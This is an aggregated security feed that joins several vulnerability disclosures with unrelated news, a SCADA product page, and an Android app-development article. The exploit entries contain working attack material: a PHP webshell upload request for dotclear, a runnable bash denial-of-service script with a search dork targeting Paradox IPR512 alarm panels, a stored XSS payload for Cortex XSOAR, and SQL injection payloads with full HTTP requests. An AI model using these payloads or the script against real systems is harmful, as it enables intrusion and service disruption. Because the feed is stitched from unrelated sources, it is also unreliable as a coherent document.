ESET Service version 16.0.26.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2023-04-05# Vendor : https://www.eset.com# Version : 16.0.26.0# Tested on OS: Microsoft Windows 11 pro x64#PoC :==============C:\>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

ESET Service 16.0.26.0 Unquoted Service Path

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

Paradox Security Systems version IPR512 suffers from a denial of service vulnerability.

#!/bin/bash

# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service  
# Google Dork: intitle:"ipr512 * - login screen"  
# Date: 09-APR-2023  
# Exploit Author: Giorgi Dograshvili  
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)  
# Version: IPR512  
# CVE : CVE-2023-24709

# Function to display banner message  
display_banner() {  
  echo "******************************************************"  
  echo "*                                                    *"  
  echo "*                PoC CVE-2023-24709                  *"  
  echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"  
  echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"  
  echo "*                                by SlashXzerozero   *"  
  echo "*                                                    *"  
  echo "******************************************************"  
}

# Call the function to display the banner  
display_banner  
  echo ""  
  echo ""  
  echo "Please enter a domain name or IP address with or without port"  
read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation  
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm  
if [[ $confirm == "Y" || $confirm == "y" ]]; then  
  # Display loading animation  
  animation=("|" "/" "-" "\\")  
  index=0  
  while [[ $index -lt 10 ]]; do  
    echo -ne "Loading ${animation[index]} \r"  
    sleep 1  
    index=$((index + 1))  
  done

  # Use curl to send HTTP GET request with custom headers and timeout  
  response=$(curl -i -s -k -X GET \  
    -H "Host: $domain" \  
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \  
    -H "Accept: */" \  
    -H "Referer: http://$domain/login.html" \  
    -H "Accept-Encoding: gzip, deflate" \  
    -H "Accept-Language: en-US,en;q=0.9" \  
    -H "Connection: close" \  
    --max-time 10 \  
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result  
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then  
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"  
  else  
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"  
  fi  
else  
  echo "The script is stopped!."  
fi

Paradox Security Systems IPR512 Denial Of Service

Palo Alto Cortex XSOAR version 6.5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)# Exploit Author: omurugur# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020# Version: 6.5.0 - 6.2.0 - 6.1.0# Tested on: [relevant os]# CVE : CVE-2022-0020# Author Web: https://www.justsecnow.com# Author Social: @omurugurrrA stored cross-site scripting (XSS) vulnerability in Palo Alto NetworkCortex XSOAR web interface enables an authenticated network-based attackerto store a persistent javascript payload that will perform arbitraryactions in the Cortex XSOAR web interface on behalf of authenticatedadministrators who encounter the payload during normal operations.POST /acc_UAB(MAY)/incidentfield HTTP/1.1Host: x.x.x.xCookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;isTimLicense=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)Gecko/20100101 Firefox/94.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://x.x.x.x/acc_UAB(MAY)Content-Type: application/jsonX-Xsrf-Token:Api_truncate_results: trueOrigin: https://x.x.x.xContent-Length: 373Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Fieldedited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}Regards,Omur UGUR

Palo Alto Cortex XSOAR 6.5.0 Cross Site Scripting

A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file /admin/inventory/manage_stock.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225406 is the identifier assigned to this vulnerability.

**Online Eyewear Shop v1.0 has SQL injection**

BUG\_Author:Gear-D

Website source address:https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html

Vulnerability File: /oews/admin/inventory/manage\_stock.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x61626364,(select (elt(999=999,1))),0x75767778,floor(rand(0)\*2))x from information\_schema.plugins group by x)a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x61626364,(select%20(elt(999=999,1))),0x75767778,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(5)))a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from%20(select(sleep(5)))a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close

CVE-2023-1969: bug_report/SQLi-1.md at main · Gear-D/bug_report

An privilege escalation issue was discovered in Scada-LTS 2.7.1.1 build 2948559113 allows remote attackers, authenticated in the application as a low-privileged user to change role (e.g., to administrator) by updating their user profile.

*   
*   The Project
*   Specifications
*   Documentation
*   Downloads

Open Source software for Supervisory Control and Data Acquisition

Scada-LTS is an Open Source, web-based, multi-platform solution for building your own SCADA (Supervisory Control and Data Acquisiton) system.

It comes bundled with many years of experience in real-world SCADA applications for Energy, Water Distribution, Manufacturing Plants, Home Automation, Laboratories... you name it!

Scada-LTS includes everything you need to get started in a few minutes: Communication Protocols, the data acquisition engine, Alarms & Events, HMI Builder and much more.

Our goal is to provide a rock-solid solution for mission-critical applications, while sharing knowledge and benefitting from an international and ever-growing community.

**Technical Specifications**

**Software Architecture**

*   Developed in Java - Server will run in any Architecture (PC/Mac/Linux)
*   Released in .WAR (multi-platform) and Windows Installer
*   User interface runs from a standard web-browser. No client installation needed.
*   SOAP and REST API´s for custom integration.

**Standard Features**

*   Data Acquisition Engine (for many popular pushed and polled protocols)
*   Watchlist - see datapoints updating in realtime
*   Datasources and Datapoint Hierarchies - organize your data
*   Graphical Views Builder (also known as HMI: Human-Machine Interface)
*   Data Reports with charts
*   User-based access with detailed permission settings
*   Scripting Engine for on-the-fly value calculations, setpoints and commands issuing
*   Multi-language with English, Portuguese, Spanish... and more coming

**Communication Protocols**

*   Modbus TCP/IP
*   DNP3
*   IEC 101
*   OPC DA 2.0
*   ASCII Serial and File readers
*   HTTP Listeners
*   HTTP Receivers (Get/Post) with REGEX parser
*   SQL Connectors (pull data from legacy SCADA databases and other systems)
*   ... and more coming

**Parameters and license**

Price

Free (GPL license)

Annual Maintenance Fee

None

\# of Data Points

Unlimited

User Connections

Unlimited

Protocols

All supported (no restrictions)

REST API

Reports

Creating a data warehouse

Optional (to order)

**Documentation****Check Scada-LTS documentation on github**

Documentation

**Scada-LTS forum on Stack Overflow - Feel free to ask questions**

Forum

**See Scada-LTS on YouTube**

YouTube

CVE-2022-41976: Scada-LTS

In Lua 5.4.3, an erroneous finalizer called during a tail call leads to a heap-based buffer over-read.

CVE-2021-45985: Lua: bugs

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.
This includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands

Software Security / Cyber Threat

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.

This includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands on the underlying system. The flaws were fixed in a patch released by Veritas in March 2021.

*   **CVE-2021-27876** (CVSS score: 8.1) - Veritas Backup Exec Agent File Access Vulnerability
*   **CVE-2021-27877** (CVSS score: 8.2) - Veritas Backup Exec Agent Improper Authentication Vulnerability
*   **CVE-2021-27878** (CVSS score: 8.8) - Veritas Backup Exec Agent Command Execution Vulnerability

Google-owned Mandiant, in a report published last week, revealed that an affiliate associated with the BlackCat (aka ALPHV and Noberus) ransomware operation is targeting publicly exposed Veritas Backup Exec installations to gain initial access by leveraging the aforementioned three bugs.

The threat intelligence firm, which is tracking the affiliate actor under its uncategorized moniker UNC4466, said it first observed exploitation of the flaws in the wild on October 22, 2022.

In one incident detailed by Mandiant, UNC4466 gained access to an internet-exposed Windows server, followed by carrying out a series of actions that allowed the attacker to deploy the Rust-based ransomware payload, but not before conducting reconnaissance, escalating privileges, and disabling Microsoft Defender's real-time monitoring capability.

Also added by CISA to the KEV catalog is CVE-2019-1388 (CVSS score: 7.8), a privilege escalation flaw impacting Microsoft Windows Certificate Dialog that could be exploited to run processes with elevated permissions on an already compromised host.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

The fifth vulnerability included in the list is an information disclosure flaw in Arm Mali GPU Kernel Driver (CVE-2023-26083) that was revealed by Google's Threat Analysis Group (TAG) last month as abused by an unnamed spyware vendor as part of an exploit chain to break into Samsung's Android smartphones.

Federal Civilian Executive Branch Agencies (FCEB) have time till April 28 to apply the patches to secure their networks against potential threats.

The advisory also comes as Apple released updates for iOS, iPadOS, macOS, and Safari web browser to address a pair of zero-day flaws (CVE-2023-28205 and CVE-2023-28206) that it said has been exploited in real-world attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of 5 Actively Exploited Security Flaws: Urgent Action Required

By Owais Sultan
Android OS is available on 3.3 billion devices in 190 countries across the globe, making Android app development…
This is a post from HackRead.com Read the original post: How to Create a Mobile Application for Android OS Step by Step?

**Android OS is available on 3.3 billion devices in 190 countries across the globe, making Android app development a task of responsibility.**

The Android platform is commonly used today for developing mobile applications, and it is maintained by the Open Handset Alliance (OHA), which is a consortium formed by Google after the purchase of Android Inc.

Android provides simplicity and convenience in using and configuring the system while also protecting data from viruses due to its high functionality when using the Internet. Additionally, it supports Adobe Flash applications, provides convenient e-mail exchange, and offers a wide variety of connectivity options, such as Bluetooth, Wi-Fi, EDGE, GPRS, and 3G.

**Android Mobile App Development Steps You Should Follow**

Mobile apps for the Android OS are typically developed on a general-purpose PC that has more resources available compared to a mobile device. Once the app is developed, it can be downloaded to the target personal mobile device for debugging, testing, and further use.

To achieve effective mobile app development, it is recommended to hire Vue.js developers who can implement your idea at the highest level. Below are the steps you must go through to develop an Android application:

**Target Audience Analysis**

The main task of this stage is to determine the ultimate goal of developing an Android mobile application and think about how it will be used by the target audience.

**Development of a Consistent Solution**

Before starting the development process, you need to obtain a technical task. Then, you can start prototyping and creating user profiles to evaluate the capabilities of the final product. Finally, you can begin the app-creation process based on the designer’s vision, business assessment, and agreement on the details of the terms of reference.

**Code Writing and Technology Implementation**

Developers begin dealing with an app with a ready-made design. Next, they must generate a mobile app based on frameworks, programming languages, and various technologies.

**Testing**

Pay attention that testing is mandatory at different stages of app development, both on simulators and on real devices. You must ensure that the interaction of the application you develop with the Android mobile device platform is exactly as expected during the prototype stage.

**Creation of a Pre-Release Version**

As a result of various tests and improvements, a working version of the mobile application should be obtained, which will then be added to the App Store and offered to a wide audience.

**Application Publishing**

The final stage of work is the publication of a mobile application in the store. It may also include additional services, such as technical support, further releases of new versions, as well as a marketing promotion.

**Basic Strategies Used in Mobile Application Development**

The development process is usually based on creating the software part of the information system as a mobile application. On the one hand, it must comply with the requirements for specific architectural solutions of the information system.

On the other hand, it must correspond to the requirements of those interested in its creation. First, the mobile app development strategy must be defined as part of this process. The complexity and scale of the project determine its choice.

Such basic mobile application development strategies as waterfall, incremental, and evolutionary are widely used today. However, they differ in the way of going through the main stages of creating the software part of an information system.

The waterfall strategy involves a single pass without refining the originally established requirements. It has the following advantages:

*   Ease of use
*   High quality of the result in the absence of strict time and budget constraints.

The disadvantages of a waterfall development strategy include the following:

*   The high complexity of requirements;
*   Inability to use intermediate states of a software solution.

The incremental strategy involves multiple passes without clarification of the originally established requirements with a planned result improvement. Its benefits include:

*   The ability to use intermediate states of a software solution, which reduces the risk of failure;
*   Involvement of stakeholders in the process of developing a software solution.

The main disadvantage of the strategy is the high complexity of the application.

The evolutionary strategy involves multiple passes with clarification of requirements. It has the following advantages:

*   Ability to refine requirements at each development cycle and implement flexible development;
*   High level of stakeholder involvement in the software solution development process.

The evolutionary strategy’s disadvantages include the application’s complexity and the need for active participation of stakeholders in the project.

The development of mobile apps is relevant in many areas, including transport services, restaurants, cafe chains, online stores, magazine businesses, and the organization of corporate communication.

Therefore, it is not surprising that many people wonder what steps should be taken to create a quality Android mobile application from scratch. It is a difficult process that requires a careful approach, specific knowledge, and skills. However, you can be sure that you will succeed if you go through all the development stages described in this article and choose one of the effective strategies that best suits the goals of your project.

1.  How to Dual Boot Android and Windows Easily
2.  Using Flutter for Cross-Platform App Development
3.  Smartphone Discounts Set To Rocket As Market Slumps
4.  What is a parental control app and what are your options
5.  10 Android Educational Apps That Collect Most User Data

How to Create a Mobile Application for Android OS Step by Step?

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 31 and April 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Tag

#windows